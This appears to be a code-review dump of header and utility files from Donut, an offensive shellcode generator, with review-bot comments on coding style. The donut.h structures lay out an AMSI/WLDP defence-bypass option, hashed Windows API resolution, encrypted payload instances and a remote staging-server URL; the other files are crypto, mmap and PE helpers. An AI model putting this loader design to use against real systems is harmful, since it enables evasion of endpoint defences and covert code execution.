157 | #define ADVAPI32_DLL "advapi32.dll" | |
158 | #define CRYPT32_DLL "crypt32.dll" | |
159 | #define MSCOREE_DLL "mscoree.dll" | |
160 | #define OLE32_DLL "ole32.dll" | |
161 | #define OLEAUT32_DLL "oleaut32.dll" | |
162 | #define WININET_DLL "wininet.dll" | |
163 | #define COMBASE_DLL "combase.dll" | |
164 | #define USER32_DLL "user32.dll" | |
165 | #define SHLWAPI_DLL "shlwapi.dll" | |
166 | ||
167 | // Per the ECMA spec, the section data looks like this: | |
168 | // taken from https://github.com/dotnet/coreclr/ | |
169 | // | |
170 | typedef struct tagMDSTORAGESIGNATURE { | |
171 | ULONG lSignature; // "Magic" signature. | |
172 | USHORT iMajorVer; // Major file version. | |
173 | USHORT iMinorVer; // Minor file version. | |
174 | ULONG iExtraData; // Offset to next structure of information | |
175 | ULONG iVersionString; // Length of version string | |
176 | BYTE pVersion[0]; // Version string | |
177 | } MDSTORAGESIGNATURE, *PMDSTORAGESIGNATURE; | |
178 | ||
179 | // | |
180 | typedef struct _file_info_t { | |
181 | int fd; | |
182 | uint64_t size; | |
183 | uint8_t *map; | |
184 | ||
185 | // the following are set for unmanaged or .NET PE/DLL files | |
186 | int type; | |
187 | int arch; | |
188 | char ver[DONUT_VER_LEN]; | |
189 | } file_info; | |
190 | ||
191 | typedef struct _API_IMPORT { | |
192 | const char *module; | |
193 | const char *name; | |
194 | } API_IMPORT, *PAPI_IMPORT; | |
195 | ||
196 | typedef struct _DONUT_CRYPT { | |
197 | BYTE mk[DONUT_KEY_LEN]; // master key | |
198 | BYTE ctr[DONUT_BLK_LEN]; // counter + nonce | |
199 | } DONUT_CRYPT, *PDONUT_CRYPT; | |
200 | ||
201 | // everything required for a module goes in the following structure | |
202 | typedef struct _DONUT_MODULE { | |
203 | DWORD type; // EXE, DLL, JS, VBS, XSL | |
204 | WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL | |
205 | WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL | |
206 | WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL | |
207 | WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL | |
208 | DWORD param_cnt; // number of parameters for DLL/EXE | |
209 | WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE | |
210 | CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption | |
211 | ULONG64 mac; // to verify decryption was ok | |
212 | ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file | |
213 | BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file | |
214 | } DONUT_MODULE, *PDONUT_MODULE; | |
215 | ||
216 | // everything required for an instance goes into the following structure | |
217 | typedef struct _DONUT_INSTANCE { | |
218 | uint32_t len; // total size of instance | |
219 | DONUT_CRYPT key; // decrypts instance | |
220 | ||
221 | uint64_t iv; // the 64-bit initial value for maru hash | |
222 | ||
223 | union { | |
224 | uint64_t hash[64]; // holds up to 64 api hashes | |
225 | void *addr[64]; // holds up to 64 api addresses | |
226 | // include prototypes only if header included from payload.h | |
227 | #ifdef PAYLOAD_H | |
228 | struct { | |
229 | // imports from kernel32.dll or kernelbase.dll | |
230 | LoadLibraryA_t LoadLibraryA; | |
231 | GetProcAddress_t GetProcAddress; | |
232 | GetModuleHandleA_t GetModuleHandleA; | |
233 | VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance | |
234 | VirtualFree_t VirtualFree; | |
235 | VirtualQuery_t VirtualQuery; | |
236 | VirtualProtect_t VirtualProtect; | |
237 | Sleep_t Sleep; | |
238 | MultiByteToWideChar_t MultiByteToWideChar; | |
239 | GetUserDefaultLCID_t GetUserDefaultLCID; | |
240 | ||
241 | // imports from oleaut32.dll | |
242 | SafeArrayCreate_t SafeArrayCreate; | |
243 | SafeArrayCreateVector_t SafeArrayCreateVector; | |
244 | SafeArrayPutElement_t SafeArrayPutElement; | |
245 | SafeArrayDestroy_t SafeArrayDestroy; | |
246 | SafeArrayGetLBound_t SafeArrayGetLBound; | |
247 | SafeArrayGetUBound_t SafeArrayGetUBound; | |
248 | SysAllocString_t SysAllocString; | |
249 | SysFreeString_t SysFreeString; | |
250 | LoadTypeLib_t LoadTypeLib; | |
251 | ||
252 | // imports from wininet.dll | |
253 | InternetCrackUrl_t InternetCrackUrl; | |
254 | InternetOpen_t InternetOpen; | |
255 | InternetConnect_t InternetConnect; | |
256 | InternetSetOption_t InternetSetOption; | |
257 | InternetReadFile_t InternetReadFile; | |
258 | InternetCloseHandle_t InternetCloseHandle; | |
259 | HttpOpenRequest_t HttpOpenRequest; | |
260 | HttpSendRequest_t HttpSendRequest; | |
261 | HttpQueryInfo_t HttpQueryInfo; | |
262 | ||
263 | // imports from mscoree.dll | |
264 | CorBindToRuntime_t CorBindToRuntime; | |
265 | CLRCreateInstance_t CLRCreateInstance; | |
266 | ||
267 | // imports from ole32.dll | |
268 | CoInitializeEx_t CoInitializeEx; | |
269 | CoCreateInstance_t CoCreateInstance; | |
270 | CoUninitialize_t CoUninitialize; | |
271 | }; | |
272 | #endif | |
273 | } api; | |
274 | ||
275 | // everything from here is encrypted | |
276 | int api_cnt; // the 64-bit hashes of API required for instance to work | |
277 | int dll_cnt; // the number of DLL to load before resolving API | |
278 | char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load | |
279 | ||
280 | union { | |
281 | char s[8]; // amsi.dll | |
282 | uint32_t w[2]; | |
283 | } amsi; | |
284 | ||
285 | int bypass; // indicates behaviour of byassing AMSI/WLDP | |
286 | char clr[8]; // clr.dll | |
287 | char wldp[16]; // wldp.dll | |
288 | char wldpQuery[32]; // WldpQueryDynamicCodeTrust | |
289 | char wldpIsApproved[32]; // WldpIsClassInApprovedList | |
290 | char amsiInit[16]; // AmsiInitialize | |
291 | char amsiScanBuf[16]; // AmsiScanBuffer | |
292 | char amsiScanStr[16]; // AmsiScanString | |
293 | ||
294 | uint16_t wscript[8]; // WScript | |
295 | uint16_t wscript_exe[16]; // wscript.exe | |
296 | ||
297 | GUID xIID_IUnknown; | |
298 | GUID xIID_IDispatch; | |
299 | ||
300 | // GUID required to load .NET assemblies | |
301 | GUID xCLSID_CLRMetaHost; | |
302 | GUID xIID_ICLRMetaHost; | |
303 | GUID xIID_ICLRRuntimeInfo; | |
304 | GUID xCLSID_CorRuntimeHost; | |
305 | GUID xIID_ICorRuntimeHost; | |
306 | GUID xIID_AppDomain; | |
307 | ||
308 | // GUID required to run VBS and JS files | |
309 | GUID xCLSID_ScriptLanguage; // vbs or js | |
310 | GUID xIID_IHost; // wscript object | |
311 | GUID xIID_IActiveScript; // engine | |
312 | GUID xIID_IActiveScriptSite; // implementation | |
313 | GUID xIID_IActiveScriptParse32; // parser | |
314 | GUID xIID_IActiveScriptParse64; | |
315 | ||
316 | // GUID required to run XSL files | |
317 | GUID xCLSID_DOMDocument30; | |
318 | GUID xIID_IXMLDOMDocument; | |
319 | GUID xIID_IXMLDOMNode; | |
320 | ||
321 | int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL | |
322 | ||
323 | struct { | |
324 | char url[DONUT_MAX_URL]; // staging server hosting donut module | |
325 | char req[8]; // just a buffer for "GET" | |
326 | } http; | |
327 | ||
328 | uint8_t sig[DONUT_MAX_NAME]; // string to hash | |
329 | uint64_t mac; // to verify decryption ok | |
330 | ||
331 | DONUT_CRYPT mod_key; // used to decrypt module | |
332 | uint64_t mod_len; // total size of module | |
333 | ||
334 | union { | |
335 | PDONUT_MODULE p; // for URL | |
336 | DONUT_MODULE x; // for PIC | |
337 | } module; | |
338 | } DONUT_INSTANCE, *PDONUT_INSTANCE; | |
339 | ||
340 | typedef struct _DONUT_CONFIG { | |
341 | int arch; // target architecture for shellcode | |
342 | int bypass; // bypass option for AMSI/WDLP | |
343 | char domain[DONUT_MAX_NAME]; // name of domain to create for assembly | |
344 | char cls[DONUT_MAX_NAME]; // name of class and optional namespace | |
345 | char method[DONUT_MAX_NAME]; // name of method to execute | |
346 | char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon | |
347 | char file[DONUT_MAX_NAME]; // assembly to create module from | |
348 | char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server | |
349 | char runtime[DONUT_MAX_NAME]; // runtime version to use. | |
350 | char modname[DONUT_MAX_NAME]; // name of module written to disk | |
351 | ||
352 | int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE | |
353 | uint64_t mod_len; // size of DONUT_MODULE | |
354 | PDONUT_MODULE mod; // points to donut module | |
355 | ||
356 | int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL | |
357 | uint64_t inst_len; // size of DONUT_INSTANCE | |
358 | PDONUT_INSTANCE inst; // points to donut instance | |
359 | ||
360 | uint64_t pic_len; // size of shellcode | |
361 | void* pic; // points to PIC/shellcode | |
362 | } DONUT_CONFIG, *PDONUT_CONFIG; | |
363 | ||
364 | #ifdef __cplusplus | |
365 | extern "C" { | |
366 | #endif | |
367 | ||
368 | #ifdef DLL | |
369 | #define EXPORT_FUNC __declspec(dllexport) | |
370 | #else | |
371 | #define EXPORT_FUNC | |
372 | #endif | |
373 | ||
374 | // public functions | |
375 | EXPORT_FUNC int DonutCreate(PDONUT_CONFIG); | |
376 | EXPORT_FUNC int DonutDelete(PDONUT_CONFIG); | |
377 | ||
378 | #ifdef __cplusplus | |
379 | } | |
380 | #endif | |
381 | ||
382 | #endif |
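Review bot: `BYTE pVersion[0];` in `MDSTORAGESIGNATURE` is a zero-length array, a compiler extension that C99 replaces with the flexible array member `BYTE pVersion[];`; the struct is only ever overlaid on mapped file data, so the change is layout-neutral. `#define DONUT_ARCH_ANY -1` should be `(-1)` so that it stays a single operand when it expands inside a larger expression. The comments on `DONUT_INSTANCE` ("total size of instance", "everything from here is encrypted") suggest the struct is serialized by the generator and read back by a loader built with a different compiler; if so, a `_Static_assert` on `sizeof(DONUT_INSTANCE)` and on `offsetof(DONUT_INSTANCE, module)` next to the typedef would turn a padding or alignment mismatch between the two builds into a compile error instead of a failed decryption check.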
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef ENCRYPT_H | |
32 | #define ENCRYPT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stddef.h> | |
36 | ||
37 | #ifndef ROTR32 | |
38 | #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n)))) | |
39 | #endif | |
40 | ||
41 | // CHASKEY block cipher | |
42 | // 128-bit block with 128-bit key | |
43 | #define ENCRYPT chaskey | |
44 | ||
45 | #define CIPHER_BLK_LEN (128/8) | |
46 | #define CIPHER_KEY_LEN (128/8) | |
47 | ||
48 | #ifdef __cplusplus | |
49 | extern "C" { | |
50 | #endif | |
51 | ||
52 | void donut_encrypt(void *mk, void *ctr, void *data, size_t len); | |
53 | ||
54 | #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len) | |
55 | ||
56 | #ifdef __cplusplus | |
57 | } | |
58 | #endif | |
59 | ||
60 | #endif |
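Review bot: The prototype `void donut_encrypt(void *mk, void *ctr, void *data, size_t len);` does not say that `ctr` is modified: encrypt.c increments the counter bytes after every block, so a caller that reuses the same `mk` with a counter it has not preserved or refreshed ends up applying the same keystream twice. A comment on the declaration such as `// CTR mode, in place: ctr is advanced per 16-byte block and a (mk, ctr) pair must never be reused` documents that, and since the key is only read, `mk` can be `const void *`. `ROTR32` evaluates `v` twice and is undefined for `n == 0` or `n >= 32`; the current call sites all pass in-range constants, but a `static inline` helper would remove the hazard for future callers.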
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2017 Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef MARU_H | |
32 | #define MARU_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <string.h> | |
36 | ||
37 | void *Memset (void *ptr, int value, size_t num); | |
38 | ||
39 | #define MARU_MAX_STR 64 | |
40 | #define MARU_BLK_LEN 16 | |
41 | #define MARU_HASH_LEN 8 | |
42 | #define MARU_IV_LEN MARU_HASH_LEN | |
43 | #define MARU_CRYPT speck | |
44 | ||
45 | #ifndef ROTR32 | |
46 | #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n)))) | |
47 | #endif | |
48 | ||
49 | #ifdef __cplusplus | |
50 | extern "C" { | |
51 | #endif | |
52 | ||
53 | uint64_t maru(const void *api, uint64_t iv); | |
54 | ||
55 | #ifdef __cplusplus | |
56 | } | |
57 | #endif | |
58 | ||
59 | #endif |
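Review bot: `#define MARU_CRYPT speck` is published here although `speck` is `static` in hash.c, so any other translation unit that expands the macro gets an undeclared-function error; keeping the macro private to hash.c would match the function's actual linkage. The declaration `uint64_t maru(const void *api, uint64_t iv);` also does not state that `api` must be a NUL-terminated string and that only the first `MARU_MAX_STR` bytes contribute to the hash, which is what hash.c implements; a comment like `// hash of a NUL-terminated string, truncated to MARU_MAX_STR bytes` makes that contract visible to callers. `Memset` is declared here but defined in none of the files in this change that I can see; a short comment naming where it lives would help.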
0 | /* mmap() replacement for Windows | |
1 | * | |
2 | * Author: Mike Frysinger <[email protected]> | |
3 | * Placed into the public domain | |
4 | */ | |
5 | ||
6 | /* References: | |
7 | * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx | |
8 | * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx | |
9 | * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx | |
10 | * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx | |
11 | */ | |
12 | ||
13 | #include "mmap.h" | |
14 | ||
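void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
{
    /* POSIX-style mmap() built on the Win32 section APIs.
     *
     *   start   ignored: placement is left to the OS (no MAP_FIXED support)
     *   length  size of the view in bytes
     *   prot    combination of PROT_READ / PROT_WRITE / PROT_EXEC; 0 maps read-only
     *   flags   MAP_PRIVATE requests a copy-on-write view; MAP_ANON requires fd == -1
     *   fd      CRT file descriptor, or -1 for an anonymous (page-file backed) mapping
     *   offset  byte offset into the file; must be non-negative, and MapViewOfFile()
     *           rejects offsets that are not a multiple of the allocation granularity
     *
     * Returns the base address of the view, or MAP_FAILED.  Release with munmap().
     */
    (void)start;

    if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
        return MAP_FAILED;
    /* A negative offset would sign-extend into the high DWORD below. */
    if (offset < 0)
        return MAP_FAILED;
    if (fd == -1) {
        if (!(flags & MAP_ANON) || offset)
            return MAP_FAILED;
    } else if (flags & MAP_ANON) {
        return MAP_FAILED;
    }

    /* Page protection for the section object. */
    DWORD flProtect;
    if (prot & PROT_WRITE)
        flProtect = (prot & PROT_EXEC) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE;
    else if (prot & PROT_EXEC)
        flProtect = (prot & PROT_READ) ? PAGE_EXECUTE_READ : PAGE_EXECUTE;
    else
        flProtect = PAGE_READONLY;

    HANDLE mmap_fd = INVALID_HANDLE_VALUE;
    if (fd != -1) {
        mmap_fd = (HANDLE)_get_osfhandle(fd);
        /* _get_osfhandle() returns INVALID_HANDLE_VALUE for a bad descriptor,
         * and CreateFileMapping() would then silently hand back an anonymous
         * mapping instead of failing, so reject it here. */
        if (mmap_fd == INVALID_HANDLE_VALUE)
            return MAP_FAILED;
    }

    /* Widen to 64 bits before splitting into the DWORD pairs the Win32 calls
     * take, so sizes and offsets past 4 GiB are not truncated. */
    unsigned long long end = (unsigned long long)length + (unsigned long long)offset;
    if (end < (unsigned long long)length) /* wrapped */
        return MAP_FAILED;
    unsigned long long off = (unsigned long long)offset;

    HANDLE h = CreateFileMapping(mmap_fd, NULL, flProtect,
                                 (DWORD)(end >> 32), (DWORD)(end & 0xffffffffu), NULL);
    if (h == NULL)
        return MAP_FAILED;

    DWORD dwDesiredAccess = (prot & PROT_WRITE) ? FILE_MAP_WRITE : FILE_MAP_READ;
    if (prot & PROT_EXEC)
        dwDesiredAccess |= FILE_MAP_EXECUTE;
    if (flags & MAP_PRIVATE)
        dwDesiredAccess |= FILE_MAP_COPY;

    void *ret = MapViewOfFile(h, dwDesiredAccess,
                              (DWORD)(off >> 32), (DWORD)(off & 0xffffffffu), length);

    /* A mapped view holds its own reference to the section object, so the
     * mapping handle can be closed on both the success and the failure path.
     * Previously it was closed only on failure and leaked on success, which
     * munmap() cannot repair because it never sees the handle. */
    CloseHandle(h);

    return ret != NULL ? ret : MAP_FAILED;
}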
65 | ||
void munmap(void *addr, size_t length)
{
    /* Release a view obtained from mmap().  UnmapViewOfFile() takes only the
     * base address, so the length argument is accepted for interface
     * compatibility and otherwise unused.  The mapping handle created inside
     * mmap() is not available here, so its lifetime must be handled there. */
    (void)length;
    UnmapViewOfFile(addr);
}
71 | ||
72 | #undef DWORD_HI | |
73 | #undef DWORD_LO |
0 | ||
1 | ||
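#ifndef MMAP_H
#define MMAP_H

/* POSIX mmap()/munmap() shim for Windows, layered over CreateFileMapping() and
 * MapViewOfFile().  Only the PROT_* and MAP_* subset below is recognised. */

#include <io.h>
#include <windows.h>
#include <sys/types.h>

#define PROT_READ 0x1
#define PROT_WRITE 0x2
/* This flag is only available in WinXP+ */
#ifdef FILE_MAP_EXECUTE
#define PROT_EXEC 0x4
#else
/* Without FILE_MAP_EXECUTE an executable view cannot be requested, so
 * PROT_EXEC becomes a no-op bit rather than an error. */
#define PROT_EXEC 0x0
#define FILE_MAP_EXECUTE 0
#endif

#define MAP_SHARED 0x01
#define MAP_PRIVATE 0x02
#define MAP_ANONYMOUS 0x20
#define MAP_ANON MAP_ANONYMOUS
#define MAP_FAILED ((void *) -1)

/* Split a size or file offset into the high/low DWORD pair the Win32 mapping
 * calls take.  The argument is widened to 64 bits first, so the result is
 * correct whatever width off_t has.  The previous definitions produced a
 * non-zero high word only under glibc's __USE_FILE_OFFSET64 (never set by
 * the Windows CRT) and truncated otherwise, and did not parenthesise x. */
#define DWORD_HI(x) ((DWORD)((ULONGLONG)(x) >> 32))
#define DWORD_LO(x) ((DWORD)((ULONGLONG)(x) & 0xffffffffu))

#ifdef __cplusplus
extern "C" {
#endif

void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
void munmap(void *addr, size_t length);

#ifdef __cplusplus
}
#endif

#endif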
0 | ||
1 | #ifndef PE_H | |
2 | #define PE_H | |
3 | ||
4 | #include "wintypes.h" | |
5 | ||
6 | // | |
7 | // Image Format | |
8 | // | |
9 | ||
10 | ||
11 | #ifndef _MAC | |
12 | ||
13 | #include "pshpack4.h" // 4 byte packing is the default | |
14 | ||
15 | #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ | |
16 | #define IMAGE_OS2_SIGNATURE 0x454E // NE | |
17 | #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE | |
18 | #define IMAGE_VXD_SIGNATURE 0x454C // LE | |
19 | #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 | |
20 | ||
21 | #include "pshpack2.h" // 16 bit headers are 2 byte packed | |
22 | ||
23 | #else | |
24 | ||
25 | #include "pshpack1.h" | |
26 | ||
27 | #define IMAGE_DOS_SIGNATURE 0x4D5A // MZ | |
28 | #define IMAGE_OS2_SIGNATURE 0x4E45 // NE | |
29 | #define IMAGE_OS2_SIGNATURE_LE 0x4C45 // LE | |
30 | #define IMAGE_NT_SIGNATURE 0x50450000 // PE00 | |
31 | #endif | |
32 | ||
// Legacy MS-DOS stub header at file offset 0, 2-byte packed (pshpack2.h above).
// e_magic must equal IMAGE_DOS_SIGNATURE; e_lfanew is the file offset of the
// IMAGE_NT_HEADERS signature and must be range-checked against the buffer size
// before it is followed.  In this tree's wintypes.h fallback LONG is an unsigned
// 32-bit type, so a negative e_lfanew cannot be detected by a sign test.
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
    WORD e_magic; // Magic number
    WORD e_cblp; // Bytes on last page of file
    WORD e_cp; // Pages in file
    WORD e_crlc; // Relocations
    WORD e_cparhdr; // Size of header in paragraphs
    WORD e_minalloc; // Minimum extra paragraphs needed
    WORD e_maxalloc; // Maximum extra paragraphs needed
    WORD e_ss; // Initial (relative) SS value
    WORD e_sp; // Initial SP value
    WORD e_csum; // Checksum
    WORD e_ip; // Initial IP value
    WORD e_cs; // Initial (relative) CS value
    WORD e_lfarlc; // File address of relocation table
    WORD e_ovno; // Overlay number
    WORD e_res[4]; // Reserved words
    WORD e_oemid; // OEM identifier (for e_oeminfo)
    WORD e_oeminfo; // OEM information; e_oemid specific
    WORD e_res2[10]; // Reserved words
    LONG e_lfanew; // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
54 | ||
55 | #ifndef _MAC | |
56 | #include "poppack.h" // Back to 4 byte packing | |
57 | #endif | |
58 | ||
59 | // | |
60 | // File header format. | |
61 | // | |
62 | ||
// COFF file header that follows the PE signature (fixed 20 bytes,
// IMAGE_SIZEOF_FILE_HEADER).  Machine is one of IMAGE_FILE_MACHINE_*,
// Characteristics a mask of IMAGE_FILE_*.  SizeOfOptionalHeader is the byte
// length of the optional header that follows and is what IMAGE_FIRST_SECTION
// uses to locate the section table; NumberOfSections bounds that table.
typedef struct _IMAGE_FILE_HEADER {
    WORD Machine;
    WORD NumberOfSections;
    DWORD TimeDateStamp;
    DWORD PointerToSymbolTable;
    DWORD NumberOfSymbols;
    WORD SizeOfOptionalHeader;
    WORD Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
72 | ||
73 | #define IMAGE_SIZEOF_FILE_HEADER 20 | |
74 | ||
// Bit flags for IMAGE_FILE_HEADER.Characteristics.
#define IMAGE_FILE_RELOCS_STRIPPED 0x0001 // Relocation info stripped from file.
#define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved external references).
#define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line numbers stripped from file.
#define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
#define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Aggressively trim working set
#define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
#define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
#define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
#define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
#define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
#define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
#define IMAGE_FILE_SYSTEM 0x1000 // System File.
#define IMAGE_FILE_DLL 0x2000 // File is a DLL.
#define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
#define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
90 | ||
91 | #define IMAGE_FILE_MACHINE_UNKNOWN 0 | |
92 | #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. | |
93 | #define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian | |
94 | #define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian | |
95 | #define IMAGE_FILE_MACHINE_R10000 0x0168 // MIPS little-endian | |
96 | #define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2 | |
97 | #define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP | |
98 | #define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian | |
99 | #define IMAGE_FILE_MACHINE_SH3DSP 0x01a3 | |
100 | #define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian | |
101 | #define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian | |
102 | #define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5 | |
103 | #define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian | |
104 | #define IMAGE_FILE_MACHINE_THUMB 0x01c2 | |
105 | #define IMAGE_FILE_MACHINE_AM33 0x01d3 | |
106 | #define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian | |
107 | #define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1 | |
108 | #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 | |
109 | #define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS | |
110 | #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 | |
111 | #define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS | |
112 | #define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS | |
113 | #define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64 | |
114 | #define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon | |
115 | #define IMAGE_FILE_MACHINE_CEF 0x0CEF | |
116 | #define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code | |
117 | #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) | |
118 | #define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian | |
119 | #define IMAGE_FILE_MACHINE_CEE 0xC0EE | |
120 | ||
121 | // | |
122 | // Directory format. | |
123 | // | |
124 | ||
// One entry of the optional header's DataDirectory table.  VirtualAddress is an
// RVA (not a file offset) and must be translated through the section table
// before the bytes are read from a file image; a zero VirtualAddress/Size pair
// means the directory is absent.
typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD VirtualAddress;
    DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
129 | ||
130 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 | |
131 | ||
132 | // | |
133 | // Optional header format. | |
134 | // | |
135 | ||
// PE32 optional header (Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC).  It differs
